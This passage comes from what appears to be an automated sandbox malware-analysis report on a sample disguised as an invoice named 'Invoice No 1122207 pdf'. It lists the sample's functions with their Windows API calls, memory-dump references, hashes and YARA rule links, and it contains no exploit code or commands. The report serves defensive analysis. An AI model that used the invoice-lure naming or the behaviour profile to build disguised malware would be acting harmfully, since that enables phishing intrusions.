Instruction Fuzzy Hash: 44310374B001199BD718CF59E490A6AF7B1FB49300BA482B6E80ACB752D735EDC5CBC5

Function 00448402 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00448440

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 2ba38ccc1f517318ac4ca6c83e4bfe39dc5b3b419bedfe04272d4e55b40f7bb4
Instruction ID: 468fc146550a3b5ad369d51ca4c32303ba9c9804c984b30da46b8717e1514b66
Opcode Fuzzy Hash: 2ba38ccc1f517318ac4ca6c83e4bfe39dc5b3b419bedfe04272d4e55b40f7bb4
Instruction Fuzzy Hash: 9C11187590410AAFDB15DF58E94199F7BF5EF48314F14406AFC08AB312EA31EA11CBA9

Function 00445000 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00444C7D: RtlAllocateHeap.NTDLL(00000008,00411129,00000000,?,00442E29,00000001,00000364,?,?,?,0043F2DE,00443863,004E1444,?,0042FDF5,?), ref: 00444CBE

_free.LIBCMT ref: 0044506C

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction ID: 3207294c87015c732eee2cb8e60bba1371940945a62811add9f7db552efcf610
Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
Instruction Fuzzy Hash: E9014E762047055BF7318F55D881A5AFBEDFB85370F65051EF184932C1EA746805C778

Function 0043E602 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction ID: 4d792ed2e3683cdd0f0f3db6df7e6a3928387465b157af95a35fa66ad32eb828
Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
Instruction Fuzzy Hash: 2DF0F932912A14D6E6313A679C06B5B37989F66339F50171FF420922D2CB7CD40285AD

Function 00419CB3 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00419CBD

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
Instruction ID: a268cbf8a751e9947d4194589647f009d4e4cd4e5668156272696b37ee65141d
Opcode Fuzzy Hash: b66f2ccc6a42f866386a2c3f527481c72d49d8aa6e16cad6a22e3b4c4ac6860b
Instruction Fuzzy Hash: 11F028B32006006ED7109F29D802BA7BBA8EF48760F50853FFA19CB1D1EB35E41487E8

Function 00444C7D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00411129,00000000,?,00442E29,00000001,00000364,?,?,?,0043F2DE,00443863,004E1444,?,0042FDF5,?), ref: 00444CBE

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 00b8a9029b60a4de6008d7f84fe3df22ef27a5458a4a8b3990a9dd5d917f4057
Instruction ID: 7ee51492ea6bf53f0f876b325c3ebd3a3d483ebfaeec00ef9577486e0ae18ae0
Opcode Fuzzy Hash: 00b8a9029b60a4de6008d7f84fe3df22ef27a5458a4a8b3990a9dd5d917f4057
Instruction Fuzzy Hash: CAF0B43164222466FB215F62AC85B5B3788AFC17B1B1E4127BC15AB2D1CA38D80146AC

Function 00443820 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,004E1444,?,0042FDF5,?,?,0041A976,00000010,004E1440,004113FC,?,004113C6,?,00411129), ref: 00443852

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: f80a1775c4178c73938ae438c7dc3135fc328c179332c78d4bdc76bbfe87b6fe
Instruction ID: 2be2194f537c97b26d387be2b5a0cfa5e511e3eb05b278967ff7e17510578f57
Opcode Fuzzy Hash: f80a1775c4178c73938ae438c7dc3135fc328c179332c78d4bdc76bbfe87b6fe
Instruction Fuzzy Hash: 49E0E53110022496F6213E679C01B9BB6C9AB82FB2F050037BC14966D1DB29ED0185ED

Function 00414F39 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,x,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00414F6D

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 5e81d9c48a0a96b64a1673927d00dc671cac0e2df3dc051f73cd1d71df787b82
Instruction ID: d8e467e417625fc9cc4bbec40cd4c4cc744f867c383fa02e1d3cfa8514ed483f
Opcode Fuzzy Hash: 5e81d9c48a0a96b64a1673927d00dc671cac0e2df3dc051f73cd1d71df787b82
Instruction Fuzzy Hash: 0BF0A970105302CFCB348F21D4908A2BBE0EF44329320897FE1EA86720C739988ADF08

Function 0047CCFF Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,0045EE51,004D3630,00000002), ref: 0047CD26

Part of subcall function 0047CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,0047CD19,?,?,?), ref: 0047CC59
Part of subcall function 0047CC37: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,0047CD19,?,?,?,?,0045EE51,004D3630,00000002), ref: 0047CC6E
Part of subcall function 0047CC37: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,0047CD19,?,?,?,?,0045EE51,004D3630,00000002), ref: 0047CC7A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: 3b61c00683fb03343fe41fd1b06d347ca452edbeeb7b2fe6eb1293dfefcf6118
Instruction ID: 348a2bd799d551c43ff72a26eb7ab1df16bed1268aefd93502c7fbdcd57e1e95
Opcode Fuzzy Hash: 3b61c00683fb03343fe41fd1b06d347ca452edbeeb7b2fe6eb1293dfefcf6118
Instruction Fuzzy Hash: 30E0397A500604EFC7219F8AD9418AABBF9FF85260710852FE99A82110D7B5AA14DBA0

Function 00412DA5 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00412DC4

Part of subcall function 00416B57: _wcslen.LIBCMT ref: 00416B6A

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 07e93df19021665f8703897f14feb267f6a17ad950f393ec9de9c6906b6ee212
Instruction ID: 2739d31557871911e61141ce964b9a973c10960a1f6eb8ab37d91c0c6c9ed021
Opcode Fuzzy Hash: 07e93df19021665f8703897f14feb267f6a17ad950f393ec9de9c6906b6ee212
Instruction Fuzzy Hash: 2FE0C273A042245BCB20A2999C06FEA77EDDFC8794F0500B6FD09E7258DA64ED848698

Function 00412B3D Relevance: 1.5, APIs: 1, Instructions: 22COMMON

Download Yara Rule

APIs

Part of subcall function 00413837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00413908

Part of subcall function 0041D730: GetInputState.USER32 ref: 0041D807

SetCurrentDirectoryW.KERNEL32(?), ref: 00412B6B

Part of subcall function 004130F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 0041314E

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: IconNotifyShell_$CurrentDirectoryInputState
String ID:
API String ID: 3667716007-0
Opcode ID: bc65e31463caa60f09d36db78d74432836b9424a3a8cc4b173e3036ef2fbf0ab
Instruction ID: 05eef3e647f2d1bdc569f713e98c19156a91d242edd2c6bba7c316fc13daa8e0
Opcode Fuzzy Hash: bc65e31463caa60f09d36db78d74432836b9424a3a8cc4b173e3036ef2fbf0ab
Instruction Fuzzy Hash: 8AE04F3160424407CA04BF66A8525EDA7999B9535AF40553FF142862A3CF6C89C5435A

Function 01229200 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 0122920B

Memory Dump Source

Source File: 00000000.00000002.1270789897.0000000001228000.00000040.00000020.00020000.00000000.sdmp, Offset: 01228000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1228000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction ID: 500b028389f8418e70b023b54a89921a43d6b1753386f3b4038048bb3a8dde34
Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
Instruction Fuzzy Hash: 79E08630925228FBDF10CABCAC056AD73A4D706314F005754E505C36C0D57099909614

Function 0045039A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00450704,?,?,00000000,?,00450704,00000000,0000000C), ref: 004503B7

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 13cd5b35064a8f4c334f2466d3f35b3b711b8666d2090b4f2faec2d5c0f6257b
Instruction ID: 04a77af7f8c2275ecb2ffb4b20581333ca1a498ae7f0c6d44ef901ceab7b802d
Opcode Fuzzy Hash: 13cd5b35064a8f4c334f2466d3f35b3b711b8666d2090b4f2faec2d5c0f6257b
Instruction Fuzzy Hash: 23D06C3214010DBBDF028F84DD46EDA3FAAFB48714F014010BE1856020C736E821AB94

Function 012291D0 Relevance: 1.5, APIs: 1, Instructions: 15COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?), ref: 012291DB

Memory Dump Source

Source File: 00000000.00000002.1270789897.0000000001228000.00000040.00000020.00020000.00000000.sdmp, Offset: 01228000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1228000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction ID: b6fc85b97e5c8205eeea5e78f7a165c8982c26bbf818ffea61d930900bea5a25
Opcode Fuzzy Hash: 63700976fb5b8646ca9f82f7877e0f33cef2a649cb81b4b88ad66ba6039b9afc
Instruction Fuzzy Hash: 99D0A73091521CFBCF10CFB99C08ADE73ACE704324F104758FD15C3281D5719A809750

Function 00411CAD Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00002001,00000000,00000002), ref: 00411CBC

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: InfoParametersSystem
String ID:
API String ID: 3098949447-0
Opcode ID: a651408382e47b846d8772c1fe62edfba992f306b6b4cddaca8a63fcdc23facc
Instruction ID: c43445fa6cd2b0e5a4a152cc0ed159e05a7acda552d4d864697e47614e2418b9
Opcode Fuzzy Hash: a651408382e47b846d8772c1fe62edfba992f306b6b4cddaca8a63fcdc23facc
Instruction Fuzzy Hash: 20C09B356C0354BFF2144780BDCAF107754A348B00F444011F6095D5F3C7F11810D758

Function 0048744A Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00415745: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0041949C,?,00008000), ref: 00415773

GetLastError.KERNEL32(00000002,00000000), ref: 004876DE

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: f38a51dd4e0268210df8882352955ddf3d0e54dcd1c00477f53080264e1328f4
Instruction ID: b08226d7e866384cf32a4baa8f2d7337db5bce7770f0ef1dc373dcc1adbc0691
Opcode Fuzzy Hash: f38a51dd4e0268210df8882352955ddf3d0e54dcd1c00477f53080264e1328f4
Instruction Fuzzy Hash: F881B3302087019FC714FF19C4A1AAEB7E1AF84358F14495EF8995B391DB38ED85CB5A

Function 0122ABDC Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0122ABF1

Memory Dump Source

Source File: 00000000.00000002.1270789897.0000000001228000.00000040.00000020.00020000.00000000.sdmp, Offset: 01228000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1228000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: c39aa4435fd1c10244783ca8215650d48d577c586d4fd7fce2cb1337f4535d7c
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 61E0BF7494410DEFDB00EFA4D6496DE7BB4EF04301F1005A1FD05D7681DB309E548A62

Function 00416246 Relevance: 1.3, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,00000000,004524E0), ref: 00416266

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 0926b4c3f446f4722fccc7d96abbc1830f42a365e7bc1cc1b011c1b4e2bd9767
Instruction ID: da00265b2faacadfb7a45a65c8ee463f8aa3072f15a5351ac89ae9b56facc391
Opcode Fuzzy Hash: 0926b4c3f446f4722fccc7d96abbc1830f42a365e7bc1cc1b011c1b4e2bd9767
Instruction Fuzzy Hash: F3E09275400B01DEC7315F1AE804492FBE6FEE13613214A6FD4E592660D7B49886CB54

Function 0122ABE0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 0122ABF1

Memory Dump Source

Source File: 00000000.00000002.1270789897.0000000001228000.00000040.00000020.00020000.00000000.sdmp, Offset: 01228000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1228000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: c3e46b95a630c777b9b9eeb3db094807377223d7c815cade17b8e9ea71b99601
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 52E0E67494410DEFDB00EFB4D64969E7FB4EF04301F100161FD01D3681D6309D508A62

Non-executed Functions

Function 004A9576 Relevance: 74.1, APIs: 39, Strings: 3, Instructions: 625windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00429BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00429BB2

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 004A961A
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004A965B
GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 004A969F
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004A96C9
SendMessageW.USER32 ref: 004A96F2
GetKeyState.USER32(00000011), ref: 004A978B
GetKeyState.USER32(00000009), ref: 004A9798
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 004A97AE
GetKeyState.USER32(00000010), ref: 004A97B8
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 004A97E9
SendMessageW.USER32 ref: 004A9810
SendMessageW.USER32(?,00001030,?,004A7E95), ref: 004A9918
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 004A992E
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 004A9941
SetCapture.USER32(?), ref: 004A994A
ClientToScreen.USER32(?,?), ref: 004A99AF
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 004A99BC
InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 004A99D6
ReleaseCapture.USER32 ref: 004A99E1
GetCursorPos.USER32(?), ref: 004A9A19
ScreenToClient.USER32(?,?), ref: 004A9A26
SendMessageW.USER32(?,00001012,00000000,?), ref: 004A9A80
SendMessageW.USER32 ref: 004A9AAE
SendMessageW.USER32(?,00001111,00000000,?), ref: 004A9AEB
SendMessageW.USER32 ref: 004A9B1A
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 004A9B3B
SendMessageW.USER32(?,0000110B,00000009,?), ref: 004A9B4A
GetCursorPos.USER32(?), ref: 004A9B68
ScreenToClient.USER32(?,?), ref: 004A9B75
GetParent.USER32(?), ref: 004A9B93
SendMessageW.USER32(?,00001012,00000000,?), ref: 004A9BFA
SendMessageW.USER32 ref: 004A9C2B
ClientToScreen.USER32(?,?), ref: 004A9C84
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 004A9CB4
SendMessageW.USER32(?,00001111,00000000,?), ref: 004A9CDE
SendMessageW.USER32 ref: 004A9D01
ClientToScreen.USER32(?,?), ref: 004A9D4E
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 004A9D82

Part of subcall function 00429944: GetWindowLongW.USER32(?,000000EB), ref: 00429952

GetWindowLongW.USER32(?,000000F0), ref: 004A9E05

Strings

@GUI_DRAGID, xrefs: 004A997D
p#N, xrefs: 004A9990
F, xrefs: 004A9D07

Memory Dump Source

Source File: 00000000.00000002.1268198680.0000000000411000.00000020.00000001.01000000.00000003.sdmp, Offset: 00410000, based on PE: true

Associated: 00000000.00000002.1268157898.0000000000410000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268771860.00000000004D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268944107.00000000004DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1268967515.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_410000_Invoice No 1122207 pdf.jbxd

Similarity

API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease
String ID: @GUI_DRAGID$F$p#N
API String ID: 3429851547-2054023450
Opcode ID: 9fce7de3f24182f80818e2dbd2f27277ce008d58c264975afd78cb97ac4a9e55
Instruction ID: 2872065ed9abebc30ef48a79d199d808c24ffbffe602ce20e88ab05f5eb9e2d2
Opcode Fuzzy Hash: 9fce7de3f24182f80818e2dbd2f27277ce008d58c264975afd78cb97ac4a9e55
Instruction Fuzzy Hash: CA42AC74605240AFDB24CF24CC84AABBBE5FF5A314F14062EF699872A1D735EC50CB5A

Function 004A4873 Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 566windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000408,00000000,00000000), ref: 004A48F3
